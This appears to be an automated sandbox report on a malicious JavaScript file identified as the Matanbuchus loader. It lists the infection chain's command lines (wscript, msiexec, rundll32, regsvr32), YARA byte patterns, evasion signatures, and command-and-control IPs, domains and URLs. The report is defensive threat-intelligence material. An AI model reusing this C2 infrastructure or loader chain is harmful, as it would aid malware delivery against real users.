Windows Analysis Report
Doc_21-04-53.js

Overview

General Information

Sample name: Doc_21-04-53.js
Analysis ID: 1570376
MD5: c10e7bce33b8d71ecd178565a63bb4ed
SHA1: b2c32607a225fe745dd4d1f40e78578621728be1
SHA256: 09b473434edae856dc199c34092a9b4a9f735a0b0aeb1a03828fa215d1ce0237
Tags: BruteRatelC4, js, Latrodectus, user-k3dg3___

Detection

Matanbuchus
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Matanbuchus
Found evasive API chain (may stop execution after checking mutex)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: WScript or CScript Dropper
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: Network Connection Initiated By Regsvr32.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7008 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc_21-04-53.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • msiexec.exe (PID: 7164 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 1312 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding B05575DDF7F0D21FAECF0BEEF6387BEE MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • conhost.exe (PID: 7028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rundll32.exe (PID: 4324 cmdline: C:/Windows/System32/rundll32.exe libcurl.dll, curl_easy_init MD5: EF3179D498793BF4234F708D3BE28633)
      • rundll32.exe (PID: 1908 cmdline: C:/Windows/System32/rundll32.exe libcurl.dll, curl_easy_init MD5: 889B99C52A60DD49227C5E485A016679)
  • regsvr32.exe (PID: 4080 cmdline: C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\813848\813848.winmd" "C:\Users\user\8f08\813848\813848.winmd" MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
    • regsvr32.exe (PID: 4940 cmdline: -e -n -i:"C:\Users\user\8f08\813848\813848.winmd" "C:\Users\user\8f08\813848\813848.winmd" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
  • regsvr32.exe (PID: 5572 cmdline: C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\813848\813848.winmd" "C:\Users\user\8f08\813848\813848.winmd" MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
    • regsvr32.exe (PID: 2500 cmdline: -e -n -i:"C:\Users\user\8f08\813848\813848.winmd" "C:\Users\user\8f08\813848\813848.winmd" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
  • regsvr32.exe (PID: 1144 cmdline: C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\813848\813848.winmd" "C:\Users\user\8f08\813848\813848.winmd" MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
    • regsvr32.exe (PID: 1712 cmdline: -e -n -i:"C:\Users\user\8f08\813848\813848.winmd" "C:\Users\user\8f08\813848\813848.winmd" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
Matanbuchus | According to PCrisk, Matanbuchus is a loader-type malicious program offered by its developers as Malware-as-a-Service (MaaS). This piece of software is designed to cause chain infections. Since it is used as a MaaS, both the malware it infiltrates into systems, and the attack reasons can vary - depending on the cyber criminals operating it. Matanbuchus has been observed being used in attacks against US universities and high schools, as well as a Belgian high-tech organization. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.matanbuchus
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\silver\libcurl.dll | JoeSecurity_Matanbuchus | Yara detected Matanbuchus | Joe Security |
C:\Users\user\8f08\813848\813848.winmd | JoeSecurity_Matanbuchus | Yara detected Matanbuchus | Joe Security |

Source | Rule | Description | Author | Strings
0000000B.00000002.2556127430.0000000004D02000.00000004.00000020.00020000.00000000.sdmp | Windows_Trojan_Matanbuchus_4ce9affb | unknown | unknown |
  • 0x1d895:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B
  • 0x1f125:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B
0000000B.00000002.2556127430.0000000004D02000.00000004.00000020.00020000.00000000.sdmp | Windows_Trojan_Matanbuchus_58a61aaa | unknown | unknown |
  • 0x33350:$a1: 55 8B EC 83 EC 08 53 56 0F 57 C0 66 0F 13 45 F8 EB 12 8B 45 F8 83 C0 01 8B 4D FC 83 D1 00 89 45 F8 89 4D FC 8B 55 FC 3B 55
00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Matanbuchus | Yara detected Matanbuchus | Joe Security |
00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Matanbuchus_4ce9affb | unknown | unknown |
  • 0x1f275:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B
  • 0x20b05:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B
00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Matanbuchus_58a61aaa | unknown | unknown |
  • 0x34d30:$a1: 55 8B EC 83 EC 08 53 56 0F 57 C0 66 0F 13 45 F8 EB 12 8B 45 F8 83 C0 01 8B 4D FC 83 D1 00 89 45 F8 89 4D FC 8B 55 FC 3B 55

Source | Rule | Description | Author | Strings
14.2.regsvr32.exe.6b610000.0.unpack | JoeSecurity_Matanbuchus | Yara detected Matanbuchus | Joe Security |
6.2.regsvr32.exe.6b610000.0.unpack | JoeSecurity_Matanbuchus | Yara detected Matanbuchus | Joe Security |
11.2.regsvr32.exe.6b610000.0.unpack | JoeSecurity_Matanbuchus | Yara detected Matanbuchus | Joe Security |
4.2.rundll32.exe.4f80000.0.unpack | JoeSecurity_Matanbuchus | Yara detected Matanbuchus | Joe Security |
4.2.rundll32.exe.6c330000.1.unpack | JoeSecurity_Matanbuchus | Yara detected Matanbuchus | Joe Security |

                  System Summary

                  Source: Network Connection, Author: Florian Roth (Nextron Systems): Data: DestinationIp: 185.234.216.175, DestinationIsIpv6: false, DestinationPort: 4443, EventID: 3, Image: C:\Windows\SysWOW64\rundll32.exe, Initiated: true, ProcessId: 1908, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49740
                  Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc_21-04-53.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc_21-04-53.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc_21-04-53.js", ProcessId: 7008, ProcessName: wscript.exe
                  Source: Network Connection, Author: frack113: Data: DestinationIp: 104.21.40.3, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\msiexec.exe, Initiated: true, ProcessId: 7164, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
                  Source: Network Connection, Author: Dmitriy Lifanov, oscd.community: Data: DestinationIp: 185.234.216.175, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\regsvr32.exe, Initiated: true, ProcessId: 4940, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49733
                  Source: Process started, Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc_21-04-53.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc_21-04-53.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc_21-04-53.js", ProcessId: 7008, ProcessName: wscript.exe

                  Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                  2024-12-06T22:20:25.117789+0100 | 2034468 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49751 | 185.234.216.175 | 4443 | TCP

                  Source: unknown, HTTPS traffic detected: 104.21.40.3:443 -> 192.168.2.4:49730 version: TLS 1.2
                  Source: unknown, HTTPS traffic detected: 185.234.216.175:443 -> 192.168.2.4:49731 version: TLS 1.2
                  Source: unknown, HTTPS traffic detected: 185.234.216.175:443 -> 192.168.2.4:49733 version: TLS 1.2
                  Source: unknown, HTTPS traffic detected: 185.234.216.175:443 -> 192.168.2.4:49780 version: TLS 1.2
                  Source: unknown, HTTPS traffic detected: 185.234.216.175:443 -> 192.168.2.4:49938 version: TLS 1.2
                  Source: C:\Windows\System32\msiexec.exe, File opened: z:, x:, v:, t:, r:, p:, n:, l:, j:, h:, f:, b:, y:, w:, u:, s:, q:, o:, m:, k:, i:, g:, e:, c:, a:

                  Networking

                  Source: Network traffic, Suricata IDS: 2034468 - Severity 1 - ET MALWARE Matanbuchus Loader CnC M3 : 192.168.2.4:49751 -> 185.234.216.175:4443
                  Source: C:\Windows\SysWOW64\regsvr32.exe, Network Connect: 185.234.216.175 443
                  Source: global traffic, TCP traffic: 192.168.2.4:49740 -> 185.234.216.175:4443
                  Source: Joe Sandbox View, ASN Name: SPRINT-SDCPL SPRINT-SDCPL
                  Source: Joe Sandbox View, JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                  Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4_2_7F2E4390 socket,gethostbyname,connect,send,recv,std::ios_base::_Ios_base_dtor,4_2_7F2E4390
                  Source: global traffic, HTTP traffic detected: GET /klog.php HTTP/1.1; Connection: Keep-Alive; Accept: */*; User-Agent: Windows Installer; Host: axizlhop.life
                  Source: global traffic, HTTP traffic detected: GET /AdminAccounts.aspx HTTP/1.1; User-Agent: Microsoft-WNS/11.0; Host: security-patches.systems; Cache-Control: no-cache
                  Source: global traffic, HTTP traffic detected: GET /verif.aspx HTTP/1.1; User-Agent: Microsoft-WNS/11.0; Host: security-patches.systems; Cache-Control: no-cache
                  Source: global traffic, DNS traffic detected: DNS query: axizlhop.life
                  Source: global traffic, DNS traffic detected: DNS query: security-patches.systems
                  Source: unknown, HTTP traffic detected: POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1; User-Agent: Microsoft-WNS/10.0; Host: security-patches.systems; Content-Length: 525; Content-Type: application/x-www-form-urlencoded; Accept-Language: fr-CA
                  Source: regsvr32.exe, String found in binary or memory: http://schemas.xml
                  Source: wscript.exe, 00000000.00000002.1700649296.0000021D64745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1700078062.0000021D645DF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1700047143.0000021D645A2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1699750711.0000021D645B7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1699750711.0000021D6459D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1700557606.0000021D645DF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1699942611.0000021D645DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1699835068.0000021D645D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1700451982.0000021D645A2000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://axizlhop.life/klog.php
                  Source: rundll32.exe, 00000004.00000002.2943141043.0000000002D9A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2943141043.0000000002DFE000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://security-patches.systems/
                  Source: rundll32.exe, 00000004.00000002.2943141043.0000000002DE7000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://security-patches.systems/AdminAccounts.aspx
                  Source: rundll32.exe, 00000004.00000002.2943141043.0000000002DFE000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://security-patches.systems/verif.aspx
                  Source: rundll32.exe, 00000004.00000002.2943141043.0000000002DFE000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://security-patches.systems/verif.aspxP

                  System Summary

                  barindex
                  Source: 6.2.regsvr32.exe.7f6d0000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Matanbuchus_4ce9affb, Author: unknown
                  Source: 6.2.regsvr32.exe.7f6d0000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Matanbuchus_58a61aaa, Author: unknown
                  Source: 4.2.rundll32.exe.7f290000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Matanbuchus_4ce9affb, Author: unknown
                  Source: 4.2.rundll32.exe.7f290000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Matanbuchus_58a61aaa, Author: unknown
                  Source: 4.2.rundll32.exe.7f290000.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Matanbuchus_4ce9affb, Author: unknown
                  Source: 4.2.rundll32.exe.7f290000.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Matanbuchus_58a61aaa, Author: unknown
                  Source: 11.2.regsvr32.exe.7ebe0000.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Matanbuchus_4ce9affb, Author: unknown
                  Source: 11.2.regsvr32.exe.7ebe0000.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Matanbuchus_58a61aaa, Author: unknown
                  Source: 11.2.regsvr32.exe.7ebe0000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Matanbuchus_4ce9affb, Author: unknown
                  Source: 11.2.regsvr32.exe.7ebe0000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Matanbuchus_58a61aaa, Author: unknown
                  Source: 6.2.regsvr32.exe.7f6d0000.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Matanbuchus_4ce9affb, Author: unknown
                  Source: 6.2.regsvr32.exe.7f6d0000.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Matanbuchus_58a61aaa, Author: unknown
                  Source: 0000000B.00000002.2556127430.0000000004D02000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Matanbuchus_4ce9affb, Author: unknown
                  Source: 0000000B.00000002.2556127430.0000000004D02000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Matanbuchus_58a61aaa, Author: unknown
                  Source: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Matanbuchus_4ce9affb, Author: unknown
                  Source: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Matanbuchus_58a61aaa, Author: unknown
                  Source: 0000000B.00000002.2556486132.000000007EBE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Matanbuchus_4ce9affb, Author: unknown
                  Source: 0000000B.00000002.2556486132.000000007EBE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Matanbuchus_58a61aaa, Author: unknown
                  Source: 00000006.00000002.2015787150.00000000050AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Matanbuchus_4ce9affb, Author: unknown
                  Source: 00000006.00000002.2015787150.00000000050AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Matanbuchus_58a61aaa, Author: unknown
                  Source: 00000004.00000002.2944220363.0000000005464000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Matanbuchus_4ce9affb, Author: unknown
                  Source: 00000004.00000002.2944220363.0000000005464000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Matanbuchus_58a61aaa, Author: unknown
                  Source: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Matanbuchus_4ce9affb, Author: unknown
                  Source: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Matanbuchus_58a61aaa, Author: unknown
                  Source: C:\Windows\System32\wscript.exe, COM Object queried: Microsoft Windows Installer HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{000C1090-0000-0000-C000-000000000046}
                  Source: C:\Windows\System32\msiexec.exe, File created: C:\Windows\Installer\MSIEB4E.tmp
                  Source: C:\Windows\System32\msiexec.exe, File created: C:\Windows\Installer\MSI67E2.tmp
                  Source: C:\Windows\System32\msiexec.exe, File created: C:\Windows\Installer\MSI6850.tmp
                  Source: C:\Windows\System32\msiexec.exe, File created: C:\Windows\Installer\MSI6890.tmp
                  Source: C:\Windows\System32\msiexec.exe, File created: C:\Windows\Installer\MSI68B0.tmp
                  Source: C:\Windows\System32\msiexec.exe, File created: C:\Windows\Installer\inprogressinstallinfo.ipi
                  Source: C:\Windows\System32\msiexec.exe, File created: C:\Windows\Installer\MSI68F0.tmp
                  Source: C:\Windows\System32\msiexec.exe, File deleted: C:\Windows\Installer\MSI67E2.tmp
                  Source: Joe Sandbox View, Dropped File: C:\Users\user\8f08\813848\813848.winmd 394401B1205D1CC5E6AF1F25183941428651E8DE0E715C5E954E25C6E49D4371
                  Source: Joe Sandbox View, Dropped File: C:\Users\user\AppData\Roaming\silver\libcurl.dll 394401B1205D1CC5E6AF1F25183941428651E8DE0E715C5E954E25C6E49D4371
                  Source: C:\Windows\SysWOW64\rundll32.exe, Code function: String function: 7F2F13A0 appears 37 times
                  Source: C:\Windows\SysWOW64\rundll32.exe, Code function: String function: 7F2FF35D appears 151 times
                  Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: String function: 7EC4F35D appears 125 times
                  Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: String function: 7F73F35D appears 121 times
                  Source: Doc_21-04-53.js, Initial sample: Strings found which are bigger than 50
                  Source: 6.2.regsvr32.exe.7f6d0000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Matanbuchus_4ce9affb, reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                  Source: 6.2.regsvr32.exe.7f6d0000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Matanbuchus_58a61aaa, reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                  Source: classification engine, Classification label: mal96.troj.evad.winJS@18/21@5/2
                  Source: C:\Windows\System32\msiexec.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\CML6929.tmp
                  Source: C:\Windows\SysWOW64\rundll32.exe, Mutant created: \Sessions\1\BaseNamedObjects\8f08
                  Source: C:\Windows\System32\conhost.exe, Mutant created: \BaseNamedObjects\Local\SM0:7028:120:WilError_03
                  Source: C:\Windows\System32\msiexec.exe, File created: C:\Windows\TEMP\~DF189CA5C6309A7118.TMP
                  Source: C:\Windows\SysWOW64\rundll32.exe, WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\System32\wscript.exe, Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: C:\Windows\System32\msiexec.exe, Process created: C:\Windows\System32\rundll32.exe C:/Windows/System32/rundll32.exe libcurl.dll, curl_easy_init
                  Source: unknown, Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc_21-04-53.js"
                  Source: unknown, Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                  Source: C:\Windows\System32\msiexec.exe, Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding B05575DDF7F0D21FAECF0BEEF6387BEE
                  Source: C:\Windows\System32\msiexec.exe, Process created: C:\Windows\System32\rundll32.exe C:/Windows/System32/rundll32.exe libcurl.dll, curl_easy_init
                  Source: C:\Windows\System32\rundll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe C:/Windows/System32/rundll32.exe libcurl.dll, curl_easy_init
                  Source: unknown, Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\813848\813848.winmd" "C:\Users\user\8f08\813848\813848.winmd"
                  Source: C:\Windows\System32\regsvr32.exe, Process created: C:\Windows\SysWOW64\regsvr32.exe -e -n -i:"C:\Users\user\8f08\813848\813848.winmd" "C:\Users\user\8f08\813848\813848.winmd"
                  Source: C:\Windows\SysWOW64\msiexec.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknown, Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\813848\813848.winmd" "C:\Users\user\8f08\813848\813848.winmd"
                  Source: C:\Windows\System32\regsvr32.exe, Process created: C:\Windows\SysWOW64\regsvr32.exe -e -n -i:"C:\Users\user\8f08\813848\813848.winmd" "C:\Users\user\8f08\813848\813848.winmd"
                  Source: unknown, Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\813848\813848.winmd" "C:\Users\user\8f08\813848\813848.winmd"
                  Source: C:\Windows\System32\regsvr32.exe, Process created: C:\Windows\SysWOW64\regsvr32.exe -e -n -i:"C:\Users\user\8f08\813848\813848.winmd" "C:\Users\user\8f08\813848\813848.winmd"
                  Source: C:\Windows\System32\wscript.exe, Section loaded: version.dll
                  Source: C:\Windows\System32\wscript.exe, Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exe, Section loaded: uxtheme.dll
                  Source: C:\Windows\System32\wscript.exe, Section loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exe, Section loaded: jscript.dll
                  Source: C:\Windows\System32\wscript.exe, Section loaded: iertutil.dll
                  Source: C:\Windows\System32\wscript.exe, Section loaded: amsi.dll
                  Source: C:\Windows\System32\wscript.exe, Section loaded: userenv.dll
                  Source: C:\Windows\System32\wscript.exe, Section loaded: profapi.dll
                  Source: C:\Windows\System32\wscript.exe, Section loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exe, Section loaded: msasn1.dll
                  Source: C:\Windows\System32\wscript.exe, Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exe, Section loaded: rsaenh.dll
                  Source: C:\Windows\System32\wscript.exe, Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\wscript.exe, Section loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exe, Section loaded: wshext.dll
                  Source: C:\Windows\System32\wscript.exe, Section loaded: scrobj.dll
                  Source: C:\Windows\System32\wscript.exe, Section loaded: msi.dll
                  Source: C:\Windows\System32\wscript.exe, Section loaded: srpapi.dll
                  Source: C:\Windows\System32\wscript.exe, Section loaded: tsappcmp.dll
                  Source: C:\Windows\System32\wscript.exe, Section loaded: netapi32.dll
                  Source: C:\Windows\System32\wscript.exe, Section loaded: wkscli.dll
                  Source: C:\Windows\System32\wscript.exe, Section loaded: netutils.dll
                  Source: C:\Windows\System32\wscript.exe, Section loaded: windows.storage.dll
                  Source: C:\Windows\System32\msiexec.exe, Section loaded: apphelp.dll
                  Source: C:\Windows\System32\msiexec.exe, Section loaded: aclayers.dll
                  Source: C:\Windows\System32\msiexec.exe, Section loaded: sfc.dll
                  Source: C:\Windows\System32\msiexec.exe, Section loaded: sfc_os.dll
                  Source: C:\Windows\System32\msiexec.exe, Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\msiexec.exe, Section loaded: msi.dll
                  Source: C:\Windows\System32\msiexec.exe, Section loaded: tsappcmp.dll
                  Source: C:\Windows\System32\msiexec.exe, Section loaded: userenv.dll
                  Source: C:\Windows\System32\msiexec.exe, Section loaded: profapi.dll
                  Source: C:\Windows\System32\msiexec.exe, Section loaded: sspicli.dll
                  Source: C:\Windows\System32\msiexec.exe, Section loaded: netapi32.dll
                  Source: C:\Windows\System32\msiexec.exe, Section loaded: wkscli.dll
                  Source: C:\Windows\System32\msiexec.exe, Section loaded: netutils.dll
                  Source: C:\Windows\System32\msiexec.exe, Section loaded: winhttp.dll
                  Source: C:\Windows\System32\msiexec.exe, Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\System32\msiexec.exe, Section loaded: iphlpapi.dll
                  Source: C:\Windows\System32\msiexec.exe, Section loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\msiexec.exe, Section loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\msiexec.exe, Section loaded: webio.dll
                  Source: C:\Windows\System32\msiexec.exe, Section loaded: mswsock.dll
                  Source: C:\Windows\System32\msiexec.exe, Section loaded: winnsi.dll
                  Source: C:\Windows\System32\msiexec.exe, Section loaded: dnsapi.dll
                  Source: C:\Windows\System32\msiexec.exe, Section loaded: rasadhlp.dll
                  Source: C:\Windows\System32\msiexec.exe, Section loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\msiexec.exe, Section loaded: schannel.dll
                  Source: C:\Windows\System32\msiexec.exe, Section loaded: mskeyprotect.dll
                  Source: C:\Windows\System32\msiexec.exe, Section loaded: ntasn1.dll
                  Source: C:\Windows\System32\msiexec.exe, Section loaded: ncrypt.dll
                  Source: C:\Windows\System32\msiexec.exe, Section loaded: ncryptsslp.dll
                  Source: C:\Windows\System32\msiexec.exe, Section loaded: msasn1.dll
                  Source: C:\Windows\System32\msiexec.exe, Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\msiexec.exe, Section loaded: rsaenh.dll
                  Source: C:\Windows\System32\msiexec.exe, Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\msiexec.exe, Section loaded: gpapi.dll
                  Source: C:\Windows\System32\msiexec.exe, Section loaded: dpapi.dll
                  Source: C:\Windows\System32\msiexec.exe, Section loaded: wldp.dll
                  Source: C:\Windows\System32\msiexec.exe, Section loaded: urlmon.dll
                  Source: C:\Windows\System32\msiexec.exe, Section loaded: iertutil.dll
                  Source: C:\Windows\System32\msiexec.exe, Section loaded: srvcli.dll
                  Source: C:\Windows\System32\msiexec.exe, Section loaded: wininet.dll
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
